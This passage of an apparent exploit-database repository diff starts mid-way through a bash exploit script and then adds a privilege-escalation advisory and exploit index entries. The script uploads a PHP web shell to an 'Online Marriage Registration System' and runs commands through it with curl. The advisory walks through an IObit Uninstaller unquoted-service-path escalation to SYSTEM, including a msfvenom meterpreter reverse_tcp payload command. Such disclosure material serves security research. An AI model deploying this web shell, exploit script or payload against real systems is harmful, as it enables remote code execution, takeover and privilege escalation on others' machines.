--data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aecho system($_GET[\'cmd\']);\x0a?>\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \
|
||||
$"$url/user/marriage-reg-form.php" >>/dev/null
|
||||
}
|
||||
upload
|
||||
|
||||
#Execute the given command
|
||||
shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '')
|
||||
|
||||
|
||||
check=$(echo $command | grep " " | wc -l)
|
||||
if [[ $check > 0 ]]
|
||||
then
|
||||
fixed_command=$(echo $command | sed 's/ /%20/g')
|
||||
curl -s "$url/user/images/$shell_file?cmd=$fixed_command"
|
||||
else
|
||||
curl -s "$url/user/images/$shell_file?cmd=$command"
|
||||
fi
|
||||
|
||||
|
||||
echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS"
|
||||
echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded"
|
||||
shift $((OPTIND-1))
|
53
exploits/windows/local/48543.txt
Normal file
53
exploits/windows/local/48543.txt
Normal file
|
@ -0,0 +1,53 @@
|
|||
# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
|
||||
# Author: Gobinathan L
|
||||
# Date: 2020-06-03
|
||||
# Vendor Homepage: https://www.iobit.com
|
||||
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
|
||||
# Version : 9.5.0.15
|
||||
# Tested on: Windows 10 64bit(EN)
|
||||
|
||||
About Unquoted Service Path :
|
||||
==============================
|
||||
|
||||
When a service is created whose executable path contains spaces and isn't enclosed within quotes,
|
||||
leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
|
||||
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
|
||||
|
||||
Steps to recreate :
|
||||
=============================
|
||||
|
||||
1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
|
||||
2. The Vulnerable Service would Show up.
|
||||
3. Check the Service Permissions by typing [ sc qc IObitUnSvr ]
|
||||
4. The command would return..
|
||||
|
||||
C:\>sc qc IObitUnSvr
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
SERVICE_NAME: IObitUnSvr
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 0 IGNORE
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : IObit Uninstaller Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
|
||||
6. Now create a Payload with msfvenom or other tools and name it to IObit.exe
|
||||
7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
|
||||
8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
|
||||
9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
|
||||
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].
|
||||
|
||||
During my testing :
|
||||
|
||||
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
|
||||
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
|
||||
|
||||
# Disclaimer :
|
||||
=========================
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
|
||||
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
|
|
@ -11084,6 +11084,7 @@ id,file,description,date,author,type,platform,port
|
|||
48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
|
||||
48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
|
||||
48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
|
||||
48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42768,3 +42769,19 @@ id,file,description,date,author,type,platform,port
|
|||
48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,
|
||||
48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php,
|
||||
48539,exploits/php/webapps/48539.txt,"OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)",2020-06-02,"Kailash Bohara",webapps,php,
|
||||
48541,exploits/hardware/webapps/48541.py,"AirControl 1.4.2 - PreAuth Remote Code Execution",2020-06-04,0xd0ff9,webapps,hardware,
|
||||
48542,exploits/php/webapps/48542.txt,"Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)",2020-06-04,Enesdex,webapps,php,
|
||||
48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,
|
||||
48545,exploits/php/webapps/48545.py,"Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)",2020-06-04,"Gus Ralph",webapps,php,
|
||||
48546,exploits/php/webapps/48546.txt,"Oriol Espinal CMS 1.0 - 'id' SQL Injection",2020-06-04,TSAR,webapps,php,
|
||||
48547,exploits/php/webapps/48547.txt,"Clinic Management System 1.0 - Authenticated Arbitrary File Upload",2020-06-04,BKpatron,webapps,php,
|
||||
48548,exploits/php/webapps/48548.txt,"Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)",2020-06-04,"Gus Ralph",webapps,php,
|
||||
48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
|
||||
48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
|
||||
48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
|
||||
48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
|
||||
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
|
||||
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
||||
48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue